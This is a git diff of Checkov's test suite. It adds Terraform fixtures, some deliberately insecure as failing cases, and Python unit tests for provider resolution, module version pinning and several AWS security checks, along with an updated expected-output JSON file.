b/tests/terraform/checks/data/aws/example_provider_with_nested_module_assign_provider/example/example2/main.tf @@ -0,0 +1,3 @@ +resource "aws_s3_bucket" "bucket"{ + bucket = "module-bucket" +} \ No newline at end of file diff --git a/tests/terraform/checks/data/aws/example_provider_with_nested_module_assign_provider/example/main.tf b/tests/terraform/checks/data/aws/example_provider_with_nested_module_assign_provider/example/main.tf new file mode 100644 index 00000000000..d62ddb0b0e1 --- /dev/null +++ b/tests/terraform/checks/data/aws/example_provider_with_nested_module_assign_provider/example/main.tf @@ -0,0 +1,3 @@ +module "example2" { + source = "./example2" +} \ No newline at end of file diff --git a/tests/terraform/checks/data/aws/example_provider_with_nested_module_assign_provider/main.tf b/tests/terraform/checks/data/aws/example_provider_with_nested_module_assign_provider/main.tf new file mode 100644 index 00000000000..88ee09cea82 --- /dev/null +++ b/tests/terraform/checks/data/aws/example_provider_with_nested_module_assign_provider/main.tf @@ -0,0 +1,16 @@ +provider "aws" { + region = "us-west-1" +} + +provider "aws" { + region = "eu-west-1" + alias = "eu-west-1" +} + +# The resources in the Provider block are not explicitly associated to this resource. +module "example" { + source = "./example" + providers = { + aws = aws.eu-west-1 + } +} \ No newline at end of file diff --git a/tests/terraform/checks/data/aws/example_provider_without_module/main.tf b/tests/terraform/checks/data/aws/example_provider_without_module/main.tf new file mode 100644 index 00000000000..e63ccd104d1 --- /dev/null +++ b/tests/terraform/checks/data/aws/example_provider_without_module/main.tf @@ -0,0 +1,17 @@ +provider "aws" { + region = "usw2" +} + +provider "aws" { + alias = "usw1" + region = "" +} + +resource "aws_s3_bucket" "bucket"{ + bucket = "bucket" + provider = aws.usw1 +} + +resource "aws_s3_bucket" "bucket_2" { + bucket = "bucket-2" +} \ No newline at end of file diff --git a/tests/terraform/checks/data/aws/test_ModuleProvider.py b/tests/terraform/checks/data/aws/test_ModuleProvider.py index c134cefd86f..099672ab004 100644 --- a/tests/terraform/checks/data/aws/test_ModuleProvider.py +++ b/tests/terraform/checks/data/aws/test_ModuleProvider.py @@ -6,7 +6,7 @@ class TestModuleProvider(unittest.TestCase): - def test(self): + def test_module_with_two_providers(self): test_files_dir = Path(__file__).parent / "example_ModuleProvider" hcl_config_parser = TFParser() @@ -15,8 +15,82 @@ def test(self): local_graph.build_graph(True) assert len(local_graph.edges) == 2 + assert local_graph.vertices[0].attributes.get('__provider_address__') == local_graph.vertices[3].attributes.get('__address__') + assert local_graph.vertices[0].attributes.get('__provider_address__') == local_graph.vertices[3].config['aws'].get('__address__') assert local_graph.edges[0].origin == 1 and local_graph.edges[0].dest == 3 assert local_graph.edges[1].origin == 0 and local_graph.edges[1].dest == 3 + def test_module_with_one_def_provider(self): + test_files_dir = Path(__file__).parent / "example_module_with_one_provider" + + hcl_config_parser = TFParser() + module, _ = hcl_config_parser.parse_hcl_module(test_files_dir, source='TERRAFORM') + local_graph = TerraformLocalGraph(module) + local_graph.build_graph(True) + + resource_provider_address = local_graph.vertices[0].attributes.get('__provider_address__') + default_provider_address_from_module = local_graph.vertices[2].attributes.get('__address__') + + assert resource_provider_address == default_provider_address_from_module + + def test_resource_with_def_provider(self): + test_files_dir = Path(__file__).parent / "example_provider_without_module" + + hcl_config_parser = TFParser() + module, _ = hcl_config_parser.parse_hcl_module(test_files_dir, source='TERRAFORM') + local_graph = TerraformLocalGraph(module) + local_graph.build_graph(True) + + # assert resource with provider ref. + resource_provider_address_with_alias = local_graph.vertices[2].attributes.get('__provider_address__') + provider_address_with_alias = local_graph.vertices[1].attributes.get('__address__') + assert resource_provider_address_with_alias == provider_address_with_alias + + # assert resource without ref to the default provider + resource_provider_address_default = local_graph.vertices[3].attributes.get('__provider_address__') + provider_address_default = local_graph.vertices[0].attributes.get('__address__') + assert resource_provider_address_default == provider_address_default + + def test_provider_nested_module(self): + test_files_dir = Path(__file__).parent / "example_provider_with_nested_module" + + hcl_config_parser = TFParser() + module, _ = hcl_config_parser.parse_hcl_module(test_files_dir, source='TERRAFORM') + local_graph = TerraformLocalGraph(module) + local_graph.build_graph(True) + + # assert resource with provider ref. + resource_provider_address_with_alias = local_graph.vertices[2].attributes.get('__provider_address__') + provider_address_with_alias = local_graph.vertices[1].attributes.get('__address__') + assert resource_provider_address_with_alias == provider_address_with_alias + + def test_example_provider_with_nested_module_assign_provider(self): + test_files_dir = Path(__file__).parent / "example_provider_with_nested_module_assign_provider" + + hcl_config_parser = TFParser() + module, _ = hcl_config_parser.parse_hcl_module(test_files_dir, source='TERRAFORM') + local_graph = TerraformLocalGraph(module) + local_graph.build_graph(True) + + # assert resource with provider ref. + resource_provider_address_with_alias = local_graph.vertices[0].attributes.get('__provider_address__') + provider_address_with_alias = local_graph.vertices[4].attributes.get('__address__') + assert resource_provider_address_with_alias == provider_address_with_alias + + def test_provider_edge_cases(self): + test_files_dir = Path(__file__).parent / "example_provider_edge_case" + + hcl_config_parser = TFParser() + module, _ = hcl_config_parser.parse_hcl_module(test_files_dir, source='TERRAFORM') + local_graph = TerraformLocalGraph(module) + local_graph.build_graph(True) + + assert local_graph.vertices[3].attributes.get('__provider_address__') == "aws.default" + assert local_graph.vertices[8].attributes.get('__provider_address__') == "module.level1.aws.default" + assert local_graph.vertices[9].attributes.get('__provider_address__') == "module.level1.aws.default" + assert local_graph.vertices[10].attributes.get('__provider_address__') == "module.level1.aws.eu_west" + assert local_graph.vertices[11].attributes.get('__provider_address__') == "aws.default" + + if __name__ == "__main__": unittest.main() diff --git a/tests/terraform/checks/module/generic/example_RevisionVersionTag/main.tf b/tests/terraform/checks/module/generic/example_RevisionVersionTag/main.tf new file mode 100644 index 00000000000..74862c9a265 --- /dev/null +++ b/tests/terraform/checks/module/generic/example_RevisionVersionTag/main.tf @@ -0,0 +1,106 @@ +# pass + +module "hash" { + source = "git::https://github.com/terraform-aws-modules/terraform-aws-vpc.git?ref=26c38a66f12e7c6c93b6a2ba127ad68981a48671" + + name = "my-vpc" + cidr = "10.0.0.0/16" + + azs = ["eu-west-1a", "eu-west-1b", "eu-west-1c"] + private_subnets = ["10.0.1.0/24", "10.0.2.0/24", "10.0.3.0/24"] + public_subnets = ["10.0.101.0/24", "10.0.102.0/24", "10.0.103.0/24"] + + enable_nat_gateway = true + enable_vpn_gateway = true + + tags = { + Terraform = "true" + Environment = "dev" + } +} + +module "sub_dir_hash" { + source = "git::https://github.com/terraform-aws-modules/terraform-aws-cloudwatch.git//modules/log-group?ref=60cf981e0f1ae033699e5b274440867e48289967" + + name = "git" + retention_in_days = 120 +} + +module "tag" { + source = "git::https://github.com/terraform-aws-modules/terraform-aws-vpc.git?ref=v5.0.0" + + name = "my-vpc" + cidr = "10.0.0.0/16" + + azs = ["eu-west-1a", "eu-west-1b", "eu-west-1c"] + private_subnets = ["10.0.1.0/24", "10.0.2.0/24", "10.0.3.0/24"] + public_subnets = ["10.0.101.0/24", "10.0.102.0/24", "10.0.103.0/24"] + + enable_nat_gateway = true + enable_vpn_gateway = true + + tags = { + Terraform = "true" + Environment = "dev" + } +} + +module "shallow_clone" { + source = "git::https://github.com/terraform-aws-modules/terraform-aws-vpc.git?depth=1&ref=v1.2.0" +} + +module "module_with_version" { + source = "terraform-aws-modules/iam/aws//modules/iam-github-oidc-role" + version = "5.39.1" +} + +# fail + +module "tf_registry_no_version" { + source = "terraform-aws-modules/cloudwatch/aws//modules/log-group" +} + +module "looks_like_a_branch" { + source = "git::https://github.com/terraform-aws-modules/terraform-aws-vpc.git?ref=some_branch_name" + + name = "my-vpc" + cidr = "10.0.0.0/16" + + azs = ["eu-west-1a", "eu-west-1b", "eu-west-1c"] + private_subnets = ["10.0.1.0/24", "10.0.2.0/24", "10.0.3.0/24"] + public_subnets = ["10.0.101.0/24", "10.0.102.0/24", "10.0.103.0/24"] + + enable_nat_gateway = true + enable_vpn_gateway = true + + tags = { + Terraform = "true" + Environment = "dev" + } +} + +module "github_module" { + source = "github.com/hashicorp/example" +} + +module "bitbucket_module" { + source = "bitbucket.org/hashicorp/terraform-consul-aws" +} + +module "github_ssh_module" { + source = "git@github.com:hashicorp/example.git" +} + +module "generic_git_module" { + source = "git::https://example.com/vpc.git" +} + +# unknown + +module "relative" { + source = "./example" +} + +module "backtrack" { + source = "../example" +} \ No newline at end of file diff --git a/tests/terraform/checks/module/generic/test_RevisionVersionTag.py b/tests/terraform/checks/module/generic/test_RevisionVersionTag.py new file mode 100644 index 00000000000..ec9031f9550 --- /dev/null +++ b/tests/terraform/checks/module/generic/test_RevisionVersionTag.py @@ -0,0 +1,50 @@ +import unittest +from pathlib import Path + +from checkov.runner_filter import RunnerFilter +from checkov.terraform.checks.module.generic.RevisionVersionTag import check +from checkov.terraform.runner import Runner + + +class TestRevisionVersionTag(unittest.TestCase): + def test(self): + # given + test_files_dir = Path(__file__).parent / "example_RevisionVersionTag" + + # when + report = Runner().run(root_folder=str(test_files_dir), runner_filter=RunnerFilter(checks=[check.id])) + + # then + summary = report.get_summary() + + passing_resources = { + "hash", + "sub_dir_hash", + "tag", + "shallow_clone", + "module_with_version" + } + + failing_resources = { + "looks_like_a_branch", + "tf_registry_no_version", + "generic_git_module", + "bitbucket_module", + "github_ssh_module", + "github_module" + } + + passed_check_resources = {c.resource for c in report.passed_checks} + failed_check_resources = {c.resource for c in report.failed_checks} + + self.assertEqual(summary["passed"], len(passing_resources)) + self.assertEqual(summary["failed"], len(failing_resources)) + self.assertEqual(summary["skipped"], 0) + self.assertEqual(summary["parsing_errors"], 0) + + self.assertEqual(passing_resources, passed_check_resources) + self.assertEqual(failing_resources, failed_check_resources) + + +if __name__ == "__main__": + unittest.main() diff --git a/tests/terraform/checks/resource/aws/example_CognitoUnauthenticatedIdentities/main.tf b/tests/terraform/checks/resource/aws/example_CognitoUnauthenticatedIdentities/main.tf new file mode 100644 index 00000000000..ab3e808e7ad --- /dev/null +++ b/tests/terraform/checks/resource/aws/example_CognitoUnauthenticatedIdentities/main.tf @@ -0,0 +1,7 @@ +resource "aws_cognito_identity_pool" "pass" { + allow_unauthenticated_identities = false +} + +resource "aws_cognito_identity_pool" "fail" { + allow_unauthenticated_identities = true +} diff --git a/tests/terraform/checks/resource/aws/example_ElasticacheReplicationGroupEncryptionAtTransitAuthToken/main.tf b/tests/terraform/checks/resource/aws/example_ElasticacheReplicationGroupEncryptionAtTransitAuthToken/main.tf new file mode 100644 index 00000000000..b5be01b1b90 --- /dev/null +++ b/tests/terraform/checks/resource/aws/example_ElasticacheReplicationGroupEncryptionAtTransitAuthToken/main.tf @@ -0,0 +1,53 @@ +resource "aws_elasticache_replication_group" "pass" { + automatic_failover_enabled = true + replication_group_id = "tf-rep-group-1" + node_type = "cache.m4.large" + parameter_group_name = "default.redis3.2" + port = 6379 + at_rest_encryption_enabled = true + transit_encryption_enabled = true + auth_token = var.auth_token +} + +resource "aws_elasticache_replication_group" "pass2" { + replication_group_id = local.replication_group_id + description = "Sample Redis replication group" + engine = "redis" + transit_encryption_enabled = true + user_group_ids = [ + "sample-group-id" + ] +} + +resource "aws_elasticache_replication_group" "fail" { + automatic_failover_enabled = true + replication_group_id = "tf-rep-group-2" + node_type = "cache.m4.large" + parameter_group_name = "default.redis3.2" + port = 6379 + at_rest_encryption_enabled = false + transit_encryption_enabled = false +} + +resource "aws_elasticache_replication_group" "fail2" { + automatic_failover_enabled = true + replication_group_id = "tf-rep-group-2" + node_type = "cache.m4.large" + parameter_group_name = "default.redis3.2" + port = 6379 + at_rest_encryption_enabled = false + transit_encryption_enabled = false + user_group_ids = [ + "sample-group-id" + ] +} + +resource "aws_elasticache_replication_group" "fail3" { + automatic_failover_enabled = true + replication_group_id = "tf-rep-group-2" + node_type = "cache.m4.large" + parameter_group_name = "default.redis3.2" + port = 6379 + at_rest_encryption_enabled = false + transit_encryption_enabled = true +} diff --git a/tests/terraform/checks/resource/aws/example_S3AllowsAnyPrincipal/main.tf b/tests/terraform/checks/resource/aws/example_S3AllowsAnyPrincipal/main.tf index 925323e004c..93ecbef2331 100644 --- a/tests/terraform/checks/resource/aws/example_S3AllowsAnyPrincipal/main.tf +++ b/tests/terraform/checks/resource/aws/example_S3AllowsAnyPrincipal/main.tf @@ -458,4 +458,29 @@ resource "aws_s3_bucket" "pass_w_condition5" { ] } POLICY +} + +resource "aws_s3_bucket" "pass_w_condition6" { + bucket = aws_s3_bucket.example_bucket.id + + policy = < None: warnings.filterwarnings("ignore", category=ResourceWarning) warnings.filterwarnings("ignore", category=DeprecationWarning) + def test_DatabricksWorkspaceDBFSRootCustomerManagedKey(self): + self.go("DatabricksWorkspaceDBFSRootEncryptedWithCustomerManagedKey") + def test_KmsKeyPolicyIsDefined(self): self.go("KmsKeyPolicyIsDefined") @@ -50,7 +53,7 @@ def test_S3NotAllowAccessToAllAuthenticatedUsers(self): self.go("S3NotAllowAccessToAllAuthenticatedUsers") def test_CloudFrontHasCustomSSLCertificate(self): - self.go("CloudFrontHasCustomSSLCertificate") + self.go("CloudFrontHasCustomSSLCertificate") def test_CodecommitApprovalRulesAttached(self): self.go("CodecommitApprovalRulesAttached") @@ -65,7 +68,7 @@ def test_APIGatewayEndpointsUsesCertificateForAuthentication(self): self.go("APIGatewayEndpointsUsesCertificateForAuthentication") def test_APIGatewayRequestParameterValidationEnabled(self): - self.go("APIGatewayRequestParameterValidationEnabled") + self.go("APIGatewayRequestParameterValidationEnabled") def test_CloudFrontUsesSecureProtocolsForHTTPS(self): self.go("CloudFrontUsesSecureProtocolsForHTTPS") @@ -74,7 +77,7 @@ def test_EMRClusterHasSecurityConfiguration(self): self.go("EMRClusterHasSecurityConfiguration") def test_OpenSearchDomainHasFineGrainedControl(self): - self.go("OpenSearchDomainHasFineGrainedControl") + self.go("OpenSearchDomainHasFineGrainedControl") def test_VPCHasRestrictedSG(self): self.go("VPCHasRestrictedSG") @@ -89,7 +92,7 @@ def test_SGAttachedToResource(self): self.go("SGAttachedToResource") def test_EC2InstanceHasIAMRoleAttached(self): - self.go("EC2InstanceHasIAMRoleAttached") + self.go("EC2InstanceHasIAMRoleAttached") def test_StorageContainerActivityLogsNotPublic(self): self.go("StorageContainerActivityLogsNotPublic") @@ -116,7 +119,7 @@ def test_DMSEndpointHaveSSLConfigured(self): self.go("DMSEndpointHaveSSLConfigured") def test_ElastiCacheRedisConfiguredAutomaticFailOver(self): - self.go("ElastiCacheRedisConfiguredAutomaticFailOver") + self.go("ElastiCacheRedisConfiguredAutomaticFailOver") def test_VAconfiguredToSendReportsToAdmins(self): self.go("VAconfiguredToSendReportsToAdmins") @@ -156,7 +159,7 @@ def test_GCPDocumentAIWarehouseLocationEncryptedWithCMK(self): def test_GCPVertexInstanceEncryptedWithCMK(self): self.go("GCPVertexInstanceEncryptedWithCMK") - + def test_GCPVertexAIEndpointEncryptedWithCMK(self): self.go("GCPVertexAIEndpointEncryptedWithCMK") @@ -171,9 +174,9 @@ def test_GCPVertexWorkbenchInstanceEncryptedWithCMK(self): def test_GCPVertexWorkbenchInstanceNoPublicIp(self): self.go("GCPVertexWorkbenchInstanceNoPublicIp") - + def test_GCRContainerVulnerabilityScanningEnabled(self): - self.go("GCRContainerVulnerabilityScanningEnabled") + self.go("GCRContainerVulnerabilityScanningEnabled") def test_AzureDataFactoriesEncryptedWithCustomerManagedKey(self): self.go("AzureDataFactoriesEncryptedWithCustomerManagedKey") @@ -194,7 +197,7 @@ def test_GCPLogBucketsConfiguredUsingLock(self): self.go("GCPLogBucketsConfiguredUsingLock") def test_CloudFunctionSecureHTTPTrigger(self): - self.go("CloudFunctionSecureHTTPTrigger") + self.go("CloudFunctionSecureHTTPTrigger") def test_GCPAuditLogsConfiguredForAllServicesAndUsers(self): self.go("GCPAuditLogsConfiguredForAllServicesAndUsers") @@ -324,10 +327,10 @@ def test_GCPKMSKeyRingsAreNotPubliclyAccessible(self): def test_GCPContainerRegistryReposAreNotPubliclyAccessible(self): self.go("GCPContainerRegistryReposAreNotPubliclyAccessible") - + def test_GCPDialogFlowAgentLoggingEnabled(self): self.go("GCPDialogFlowAgentLoggingEnabled") - + def test_GCPDialogFlowCxAgentLoggingEnabled(self): self.go("GCPDialogFlowCxAgentLoggingEnabled") @@ -336,13 +339,13 @@ def test_GCPDialogFlowCxWebhookLoggingEnabled(self): def test_GCPVertexAIPrivateEndpoint(self): self.go("GCPVertexAIPrivateEndpoint") - + def test_GCPVertexAIPrivateIndexEndpoint(self): self.go("GCPVertexAIPrivateIndexEndpoint") def test_GCPTpuV2VmPrivateEndpoint(self): self.go("GCPTpuV2VmPrivateEndpoint") - + def test_GCPVertexRuntimePrivate(self): self.go("GCPVertexRuntimePrivate") @@ -411,7 +414,7 @@ def test_GCPMySQLdbInstancePoint_In_TimeRecoveryBackupIsEnabled(self): def test_GCPdisableAlphaClusterFeatureInKubernetesEngineClusters(self): self.go("GCPdisableAlphaClusterFeatureInKubernetesEngineClusters") - + def test_AzureContainerInstanceconfigManagedIdentity(self): self.go("AzureContainerInstanceconfigManagedIdentity") @@ -429,7 +432,7 @@ def test_AzureKeyVaultConfigPrivateEndpoint(self): def test_AzureStorageAccConfigWithPrivateEndpoint(self): self.go("AzureStorageAccConfigWithPrivateEndpoint") - + def test_OCI_K8EngineClusterBootVolConfigInTransitEncryption(self): self.go("OCI_K8EngineClusterBootVolConfigInTransitEncryption") @@ -456,6 +459,12 @@ def test_AzureAutomationAccConfigManagedIdentity(self): def test_AzureMariaDBserverUsingTLS_1_2(self): self.go("AzureMariaDBserverUsingTLS_1_2") + + def test_AzureMLWorkspaceWithPublicStorageAccount(self): + self.go("AzureMLWorkspaceHBIPublicNetwork") + + def test_AzureMLWorkspacePublicNetwork(self): + self.go("AzureMLWorkspacePublicNetwork") def test_AzureStorageAccountEnableSoftDelete(self): self.go("AzureStorageAccountEnableSoftDelete") @@ -496,6 +505,9 @@ def test_IBM_AppLBforVPCisPrivate(self): def test_IBM_VPCclassicAccessIsDisabled(self): self.go("IBM_VPCclassicAccessIsDisabled") + def test_SageMakerIAMPolicyOverlyPermissiveToAllTraffic(self): + self.go("SageMakerIAMPolicyOverlyPermissiveToAllTraffic") + def test_IBM_RestrictServiceIDCreationInAccountSettings(self): self.go("IBM_RestrictServiceIDCreationInAccountSettings") @@ -511,6 +523,9 @@ def test_IBM_DatabasesNWaccessRestrictedToSpecificIPrange(self): def test_IBM_K8sClustersAccessibleViaPrivateEndPt(self): self.go("IBM_K8sClustersAccessibleViaPrivateEndPt") + def test_S3CMKRegularRotation(self): + self.go("S3CMKRegularRotation") + def test_registry_load(self): registry = Registry(parser=GraphCheckParser(), checks_dir=str( Path(__file__).parent.parent.parent.parent.parent / "checkov" / "terraform" / "checks" / "graph_checks")) diff --git a/tests/terraform/graph/variable_rendering/expected_foreach_module_dup_foreach.json b/tests/terraform/graph/variable_rendering/expected_foreach_module_dup_foreach.json index e8735ca7d20..6aef536a90b 100644 --- a/tests/terraform/graph/variable_rendering/expected_foreach_module_dup_foreach.json +++ b/tests/terraform/graph/variable_rendering/expected_foreach_module_dup_foreach.json @@ -3,6 +3,7 @@ "module": [ { "s3_module[\"a\"]": { + "__address__": "s3_module[\"a\"]", "__end_line__": 12, "__resolved__": [ "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}" @@ -16,12 +17,12 @@ ], "source": [ "./module" - ], - "__address__": "s3_module[\"a\"]" + ] } }, { "s3_module2[0]": { + "__address__": "s3_module2[0]", "__end_line__": 19, "__resolved__": [ "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, \"nested_tf_module\": null}}" @@ -35,12 +36,12 @@ ], "source": [ "./module" - ], - "__address__": "s3_module2[0]" + ] } }, { "s3_module[\"b\"]": { + "__address__": "s3_module[\"b\"]", "__end_line__": 12, "__resolved__": [ "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"b\", \"nested_tf_module\": null}}" @@ -54,12 +55,12 @@ ], "source": [ "./module" - ], - "__address__": "s3_module[\"b\"]" + ] } }, { "s3_module2[1]": { + "__address__": "s3_module2[1]", "__end_line__": 19, "__resolved__": [ "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 1, \"nested_tf_module\": null}}" @@ -73,14 +74,14 @@ ], "source": [ "./module" - ], - "__address__": "s3_module2[1]" + ] } } ], "provider": [ { "aws": { + "__address__": "aws.test_provider", "__end_line__": 5, "__start_line__": 1, "alias": [ @@ -91,8 +92,7 @@ ], "test_provider": [ true - ], - "__address__": "aws.test_provider" + ] } } ] @@ -101,88 +101,178 @@ "module": [ { "inner_s3_module[\"c\"]": { + "__address__": "module.s3_module[\"a\"].inner_s3_module[\"c\"]", "__end_line__": 5, "__resolved__": [ - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}" + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"c\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}" + ], + "__start_line__": 1, + "bucket2": [ + false + ], + "source": [ + "./module2" + ] + } + }, + { + "inner_s3_module2[\"e\"]": { + "__address__": "module.s3_module[\"a\"].inner_s3_module2[\"e\"]", + "__end_line__": 11, + "__resolved__": [ + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"e\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}" + ], + "__start_line__": 7, + "bucket2": [ + "" + ], + "source": [ + "./module2" + ] + } + }, + { + "inner_s3_module[\"d\"]": { + "__address__": "module.s3_module[\"a\"].inner_s3_module[\"d\"]", + "__end_line__": 5, + "__resolved__": [ + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": \"d\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}" ], "__start_line__": 1, "bucket2": [ - "var.bucket" + false ], "source": [ "./module2" + ] + } + }, + { + "inner_s3_module2[\"f\"]": { + "__address__": "module.s3_module[\"a\"].inner_s3_module2[\"f\"]", + "__end_line__": 11, + "__resolved__": [ + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": \"f\", \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}" ], - "__address__": "module.s3_module[\"a\"].inner_s3_module[\"c\"]" + "__start_line__": 7, + "bucket2": [ + "" + ], + "source": [ + "./module2" + ] + } + } + ], + "variable": [ + { + "bucket": { + "__address__": "module.s3_module[\"a\"].bucket", + "__end_line__": 16, + "__start_line__": 14, + "type": [ + "string" + ] + } + }, + { + "bucket2": { + "__address__": "module.s3_module[\"a\"].bucket2", + "__end_line__": 20, + "__start_line__": 18, + "type": [ + "string" + ] + } + } + ] + }, + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"b\", \"nested_tf_module\": null}}": { + "module": [ + { + "inner_s3_module[\"c\"]": { + "__address__": "module.s3_module[\"b\"].inner_s3_module[\"c\"]", + "__end_line__": 5, + "__resolved__": [ + "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}" + ], + "__start_line__": 1, + "bucket2": [ + false + ], + "source": [ + "./module2" + ] } }, { "inner_s3_module2[\"e\"]": { + "__address__": "module.s3_module[\"b\"].inner_s3_module2[\"e\"]", "__end_line__": 11, "__resolved__": [ "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}" ], "__start_line__": 7, "bucket2": [ - "var.bucket2" + "" ], "source": [ "./module2" - ], - "__address__": "module.s3_module[\"a\"].inner_s3_module2[\"e\"]" + ] } }, { "inner_s3_module[\"d\"]": { + "__address__": "module.s3_module[\"b\"].inner_s3_module[\"d\"]", "__end_line__": 5, "__resolved__": [ "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}" ], "__start_line__": 1, "bucket2": [ - "var.bucket" + false ], "source": [ "./module2" - ], - "__address__": "module.s3_module[\"a\"].inner_s3_module[\"d\"]" + ] } }, { "inner_s3_module2[\"f\"]": { + "__address__": "module.s3_module[\"b\"].inner_s3_module2[\"f\"]", "__end_line__": 11, "__resolved__": [ "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module2\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module\", \"foreach_idx\": \"a\", \"nested_tf_module\": null}}}" ], "__start_line__": 7, "bucket2": [ - "var.bucket2" + "" ], "source": [ "./module2" - ], - "__address__": "module.s3_module[\"a\"].inner_s3_module2[\"f\"]" + ] } } ], "variable": [ { "bucket": { + "__address__": "module.s3_module[\"b\"].bucket", "__end_line__": 16, "__start_line__": 14, "type": [ "string" - ], - "__address__": "module.s3_module[\"a\"].bucket" + ] } }, { "bucket2": { + "__address__": "module.s3_module[\"b\"].bucket2", "__end_line__": 20, "__start_line__": 18, "type": [ "string" - ], - "__address__": "module.s3_module[\"a\"].bucket2" + ] } } ] @@ -191,88 +281,178 @@ "module": [ { "inner_s3_module[\"c\"]": { + "__address__": "module.s3_module2[0].inner_s3_module[\"c\"]", "__end_line__": 5, "__resolved__": [ - "{\"file_path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/module2/main.tf\", \"tf_source_modules\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/module/main.tf\", \"name\": \"inner_s3_module\", \"foreach_idx\": null, \"nested_tf_module\": {\"path\": \".../tests/terraform/graph/variable_rendering/resources/foreach_module_dup_foreach/main.tf\", \"name\": \"s3_module2\", \"foreach_idx\": 0, 